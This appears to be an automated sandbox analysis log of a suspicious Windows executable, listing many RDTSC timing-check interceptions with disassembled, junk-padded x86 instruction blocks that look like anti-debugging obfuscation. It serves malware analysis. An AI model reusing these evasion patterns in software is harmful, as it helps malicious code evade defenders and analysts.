Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D207A0 second address: 4D2084C instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a movzx ecx, bx 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 mov edi, eax 0x00000014 popad 0x00000015 pushfd 0x00000016 jmp 00007F95FD7D899Ch 0x0000001b and ax, 0248h 0x00000020 jmp 00007F95FD7D899Bh 0x00000025 popfd 0x00000026 popad 0x00000027 mov dword ptr [esp], ecx 0x0000002a jmp 00007F95FD7D89A6h 0x0000002f mov eax, dword ptr [76FA65FCh] 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F95FD7D899Eh 0x0000003b sbb ax, 27D8h 0x00000040 jmp 00007F95FD7D899Bh 0x00000045 popfd 0x00000046 call 00007F95FD7D89A8h 0x0000004b mov di, cx 0x0000004e pop esi 0x0000004f popad 0x00000050 test eax, eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F95FD7D89A8h 0x00000059 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D2084C second address: 4D2085E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95FD07A05Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D2085E second address: 4D20888 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F966F9DBA96h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movzx eax, bx 0x00000014 jmp 00007F95FD7D89A5h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D20888 second address: 4D208D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, DABEh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ecx, eax 0x0000000c jmp 00007F95FD07A065h 0x00000011 xor eax, dword ptr [ebp+08h] 0x00000014 jmp 00007F95FD07A067h 0x00000019 and ecx, 1Fh 0x0000001c pushad 0x0000001d mov bx, si 0x00000020 push eax 0x00000021 push edx 0x00000022 mov si, C83Dh 0x00000026 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D208D0 second address: 4D2096B instructions: 0x00000000 rdtsc 0x00000002 call 00007F95FD7D899Ah 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b ror eax, cl 0x0000000d pushad 0x0000000e movsx ebx, si 0x00000011 mov si, F9CFh 0x00000015 popad 0x00000016 leave 0x00000017 pushad 0x00000018 push eax 0x00000019 pushfd 0x0000001a jmp 00007F95FD7D89A7h 0x0000001f jmp 00007F95FD7D89A3h 0x00000024 popfd 0x00000025 pop ecx 0x00000026 call 00007F95FD7D89A9h 0x0000002b mov esi, 05F99F87h 0x00000030 pop eax 0x00000031 popad 0x00000032 retn 0004h 0x00000035 nop 0x00000036 mov esi, eax 0x00000038 lea eax, dword ptr [ebp-08h] 0x0000003b xor esi, dword ptr [003C2014h] 0x00000041 push eax 0x00000042 push eax 0x00000043 push eax 0x00000044 lea eax, dword ptr [ebp-10h] 0x00000047 push eax 0x00000048 call 00007F96021792E4h 0x0000004d push FFFFFFFEh 0x0000004f pushad 0x00000050 pushfd 0x00000051 jmp 00007F95FD7D89A9h 0x00000056 jmp 00007F95FD7D899Bh 0x0000005b popfd 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D2096B second address: 4D209A9 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 jmp 00007F95FD07A05Eh 0x0000000d ret 0x0000000e nop 0x0000000f push eax 0x00000010 call 00007F9601A1A9E1h 0x00000015 mov edi, edi 0x00000017 jmp 00007F95FD07A060h 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007F95FD07A05Dh 0x00000025 mov di, si 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D209A9 second address: 4D209AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D209AF second address: 4D209B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D209B3 second address: 4D209EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D899Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F95FD7D89A9h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov di, 32DAh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D209EB second address: 4D20A06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95FD07A067h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D20A06 second address: 4D20A16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D20A16 second address: 4D20A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D20A1A second address: 4D20A20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0060 second address: 4CD00D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A066h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F95FD07A060h 0x00000010 and esp, FFFFFFF8h 0x00000013 jmp 00007F95FD07A060h 0x00000018 xchg eax, ecx 0x00000019 pushad 0x0000001a jmp 00007F95FD07A05Eh 0x0000001f mov di, si 0x00000022 popad 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F95FD07A069h 0x0000002d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD00D1 second address: 4CD00D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD00D7 second address: 4CD00DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD00DD second address: 4CD00E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD00E1 second address: 4CD0121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 pushad 0x0000000a mov edx, eax 0x0000000c pushfd 0x0000000d jmp 00007F95FD07A05Ch 0x00000012 jmp 00007F95FD07A065h 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F95FD07A05Dh 0x00000021 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0121 second address: 4CD014D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D89A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F95FD7D89A1h 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD014D second address: 4CD0155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0155 second address: 4CD0167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, 2211h 0x00000008 popad 0x00000009 popad 0x0000000a mov ebx, dword ptr [ebp+10h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0167 second address: 4CD017C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F95FD07A05Fh 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD017C second address: 4CD019C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D89A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD019C second address: 4CD01D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F95FD07A063h 0x0000000a xor cx, 120Eh 0x0000000f jmp 00007F95FD07A069h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD01D4 second address: 4CD01FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F95FD7D89A7h 0x00000008 pop esi 0x00000009 mov di, 7ECCh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD01FD second address: 4CD0201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0201 second address: 4CD0218 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D89A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0218 second address: 4CD02A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F95FD07A05Fh 0x00000009 sub eax, 571E7A2Eh 0x0000000f jmp 00007F95FD07A069h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F95FD07A060h 0x0000001b and cx, 57A8h 0x00000020 jmp 00007F95FD07A05Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 xchg eax, esi 0x0000002a jmp 00007F95FD07A066h 0x0000002f mov esi, dword ptr [ebp+08h] 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F95FD07A067h 0x00000039 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD02A3 second address: 4CD0306 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F95FD7D899Fh 0x00000009 jmp 00007F95FD7D89A3h 0x0000000e popfd 0x0000000f call 00007F95FD7D89A8h 0x00000014 pop esi 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ebx 0x00000019 jmp 00007F95FD7D899Eh 0x0000001e mov dword ptr [esp], edi 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F95FD7D899Ah 0x0000002a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0306 second address: 4CD030A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD030A second address: 4CD0310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0310 second address: 4CD0321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95FD07A05Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0321 second address: 4CD0325 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0325 second address: 4CD0335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0335 second address: 4CD0339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0339 second address: 4CD034F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A062h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD034F second address: 4CD0361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95FD7D899Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0361 second address: 4CD0365 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0365 second address: 4CD037C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F966FA26C3Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov edi, 059A663Ah 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD037C second address: 4CD03AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 31D8301Dh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000012 pushad 0x00000013 call 00007F95FD07A065h 0x00000018 pushad 0x00000019 popad 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d movsx edi, ax 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD03AC second address: 4CD03E3 instructions: 0x00000000 rdtsc 0x00000002 mov dx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 je 00007F966FA26C0Dh 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F95FD7D899Eh 0x00000015 add ax, 1D08h 0x0000001a jmp 00007F95FD7D899Bh 0x0000001f popfd 0x00000020 popad 0x00000021 mov edx, dword ptr [esi+44h] 0x00000024 pushad 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD03E3 second address: 4CD045D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F95FD07A05Ch 0x0000000a add cx, BF68h 0x0000000f jmp 00007F95FD07A05Bh 0x00000014 popfd 0x00000015 popad 0x00000016 mov ch, F1h 0x00000018 popad 0x00000019 or edx, dword ptr [ebp+0Ch] 0x0000001c jmp 00007F95FD07A05Bh 0x00000021 test edx, 61000000h 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F95FD07A05Bh 0x0000002e and si, 6B5Eh 0x00000033 jmp 00007F95FD07A069h 0x00000038 popfd 0x00000039 popad 0x0000003a jne 00007F966F2C8294h 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F95FD07A05Ah 0x00000048 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC077F second address: 4CC07A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D89A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F95FD7D899Ch 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC07A3 second address: 4CC07E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F95FD07A061h 0x00000009 xor cx, 6486h 0x0000000e jmp 00007F95FD07A061h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 mov ebx, 7BB43B0Eh 0x0000001e mov edx, 5CFCFA1Ah 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 mov cx, bx 0x0000002c rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC07E7 second address: 4CC07FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, edi 0x00000008 popad 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov dx, 9470h 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC07FA second address: 4CC083D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F95FD07A064h 0x0000000a and si, 5CB8h 0x0000000f jmp 00007F95FD07A05Bh 0x00000014 popfd 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F95FD07A065h 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC083D second address: 4CC0843 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0843 second address: 4CC0847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0847 second address: 4CC0864 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F95FD7D89A0h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0864 second address: 4CC0868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0868 second address: 4CC086E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC086E second address: 4CC0906 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F95FD07A05Ch 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f mov al, F6h 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F95FD07A05Eh 0x0000001a add ax, 2B08h 0x0000001f jmp 00007F95FD07A05Bh 0x00000024 popfd 0x00000025 mov dx, ax 0x00000028 popad 0x00000029 mov dword ptr [esp], esi 0x0000002c pushad 0x0000002d jmp 00007F95FD07A060h 0x00000032 popad 0x00000033 mov esi, dword ptr [ebp+08h] 0x00000036 jmp 00007F95FD07A067h 0x0000003b sub ebx, ebx 0x0000003d jmp 00007F95FD07A05Fh 0x00000042 test esi, esi 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F95FD07A065h 0x0000004b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0906 second address: 4CC090C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC090C second address: 4CC0910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0910 second address: 4CC0926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F966FA2E40Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 mov bl, ah 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0926 second address: 4CC096E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F95FD07A066h 0x00000009 adc ah, FFFFFFB8h 0x0000000c jmp 00007F95FD07A05Bh 0x00000011 popfd 0x00000012 mov edi, eax 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F95FD07A061h 0x00000025 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC096E second address: 4CC097E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95FD7D899Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC097E second address: 4CC09BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, esi 0x0000000a jmp 00007F95FD07A067h 0x0000000f je 00007F966F2CFA5Ah 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F95FD07A065h 0x0000001c rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC09BC second address: 4CC0A31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F95FD7D89A7h 0x00000009 xor eax, 0B0CD99Eh 0x0000000f jmp 00007F95FD7D89A9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F95FD7D89A0h 0x0000001b jmp 00007F95FD7D89A5h 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 test byte ptr [76FA6968h], 00000002h 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov cx, dx 0x00000031 pushad 0x00000032 popad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0A31 second address: 4CC0A37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0A37 second address: 4CC0A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0A3B second address: 4CC0A65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A05Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F966F2CF9BFh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 call 00007F95FD07A05Dh 0x00000019 pop eax 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0A65 second address: 4CC0A96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D899Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F95FD7D899Eh 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F95FD7D899Ah 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0A96 second address: 4CC0AA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A05Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0AA5 second address: 4CC0ACF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F95FD7D899Fh 0x00000008 push ecx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F95FD7D89A0h 0x00000015 rdtsc
